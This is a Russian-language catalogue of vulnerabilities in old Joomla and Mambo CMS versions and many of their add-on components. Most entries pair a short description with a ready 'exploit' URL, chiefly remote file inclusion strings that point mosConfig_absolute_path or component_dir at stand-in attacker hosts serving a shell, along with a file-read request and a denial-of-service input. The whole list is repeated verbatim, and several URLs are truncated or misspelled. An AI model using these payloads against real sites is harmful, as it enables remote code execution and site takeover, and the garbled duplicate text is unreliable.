URL производителя Mambo CMS : www.mamboserver.com
URL производителя Joomla CMS : www.joomla.org
Что почитать : http://ru-mambo.ru/index.php?option=com_content&task=blogcategory&id=123
http://joom.ru/
http://myjoomla.ru
JOOMLA & MAMBO
Joomla : < 1.0.4
Недостаточно фильтруются данные в параметре "Itemid" в модуле "mod_poll" и в других методах в классе "mosDBTable".
Joomla : 1.0.5
Уязвимость существует из-за того, что программное обеспечение позволяет злоумышленнику получить доступ к vCard других пользователей с помощью специально сформированного URL.
Joomla : 1.0.10 ; 4.5.4 и 4.6 RC2 ( Mambo )
Уязвимость существует из-за недостаточной фильтрации входящего параметра "id" и позволяет выполнять произвольный SQL запросы.
Примечание : Для удачной эксплуатации уязвимости злоумышленник должен иметь привилегии редактора.
Joomla : 1.0.7
Уязвимость существует при обработке входных данных в сценарии includes/feedcreator.class.php.
Эксплоит : index.php?option=com_rss&feed=filename_here&no_html=1
Уязвимость существует при обработке входных данных в сценарии includes/phpInputFilter/class.inputfilter.php.
Эксплоит :index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Joomla : 1.0.9
Уязвимость существует из-за недостаточной обработки входных данных в параметре "Name".
Mambo : 3.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_mambatstaff/mambatstaff.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Mambo : 4.5.2.3
Уязвимость существует из-за ошибки в уровне эмуляции "register_globals" в сценарии "globals.php".
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
УЯЗВИМОСТИ В МОДАХ-НАДСТРОЙКАХ ДЛЯ JOOMLA CMS
Community Builder 1.0 RC 2 и 1.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_comprofiler/plugin.class.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
JIM : 1.0.1
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'install.jim.php'
Эксплоит : http://victim/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Coppermine 1.0
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'cpg.php'
Эксплоит : http://victim/components/com_cpg/cpg.php?m..._absolute_path=
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Webring 1.0
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'admin.webring.docs.php'
Эксплоит : http://victim/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
JD-Wiki < 1.0.3
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'main.php'
Эксплоит : /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Security Images 3.0.5
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path"
Эксплоит : http://victim/components/com_securityimage...ttp://shell.txt
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Colophon 1.2
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_colophon/admin.colophon.php.
Эксплоит :htttp:/victim/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Mambo-SMF Forum 1.3.1.3
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_smf/smf.php.
Эксплоит : http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
PollXT 1.22.07
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pollxt/conf.pollxt.php.
Эксплоит : http://victim/components/com_pollxt/conf.p...http://evilhost
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
perForms 1.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии performs.php.
Эксплоит : http://www.vuln.com/components/com_perform...http://evilhost
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
com_hashcash 1.2.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_hashcash/server.php.
Эксплоит : http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path=http://attacker.com/evil.txt?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
PccookBook 1.3.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pccookbook/pccookbook.php.
Эксплоит : http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
URL производителя Joomla CMS : www.joomla.org
Что почитать : http://ru-mambo.ru/index.php?option=com_content&task=blogcategory&id=123
http://joom.ru/
http://myjoomla.ru
JOOMLA & MAMBO
Joomla : < 1.0.4
Недостаточно фильтруются данные в параметре "Itemid" в модуле "mod_poll" и в других методах в классе "mosDBTable".
Joomla : 1.0.5
Уязвимость существует из-за того, что программное обеспечение позволяет злоумышленнику получить доступ к vCard других пользователей с помощью специально сформированного URL.
Joomla : 1.0.10 ; 4.5.4 и 4.6 RC2 ( Mambo )
Уязвимость существует из-за недостаточной фильтрации входящего параметра "id" и позволяет выполнять произвольный SQL запросы.
Примечание : Для удачной эксплуатации уязвимости злоумышленник должен иметь привилегии редактора.
Joomla : 1.0.7
Уязвимость существует при обработке входных данных в сценарии includes/feedcreator.class.php.
Эксплоит : index.php?option=com_rss&feed=filename_here&no_html=1
Уязвимость существует при обработке входных данных в сценарии includes/phpInputFilter/class.inputfilter.php.
Эксплоит :index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Joomla : 1.0.9
Уязвимость существует из-за недостаточной обработки входных данных в параметре "Name".
Mambo : 3.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_mambatstaff/mambatstaff.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Mambo : 4.5.2.3
Уязвимость существует из-за ошибки в уровне эмуляции "register_globals" в сценарии "globals.php".
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
УЯЗВИМОСТИ В МОДАХ-НАДСТРОЙКАХ ДЛЯ JOOMLA CMS
Community Builder 1.0 RC 2 и 1.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_comprofiler/plugin.class.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
JIM : 1.0.1
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'install.jim.php'
Эксплоит : http://victim/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Coppermine 1.0
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'cpg.php'
Эксплоит : http://victim/components/com_cpg/cpg.php?m..._absolute_path=
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Webring 1.0
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'admin.webring.docs.php'
Эксплоит : http://victim/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
JD-Wiki < 1.0.3
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'main.php'
Эксплоит : /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Security Images 3.0.5
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path"
Эксплоит : http://victim/components/com_securityimage...ttp://shell.txt
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Colophon 1.2
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_colophon/admin.colophon.php.
Эксплоит :htttp:/victim/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Mambo-SMF Forum 1.3.1.3
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_smf/smf.php.
Эксплоит : http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
PollXT 1.22.07
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pollxt/conf.pollxt.php.
Эксплоит : http://victim/components/com_pollxt/conf.p...http://evilhost
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
perForms 1.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии performs.php.
Эксплоит : http://www.vuln.com/components/com_perform...http://evilhost
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
com_hashcash 1.2.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_hashcash/server.php.
Эксплоит : http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path=http://attacker.com/evil.txt?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
PccookBook 1.3.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pccookbook/pccookbook.php.
Эксплоит : http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?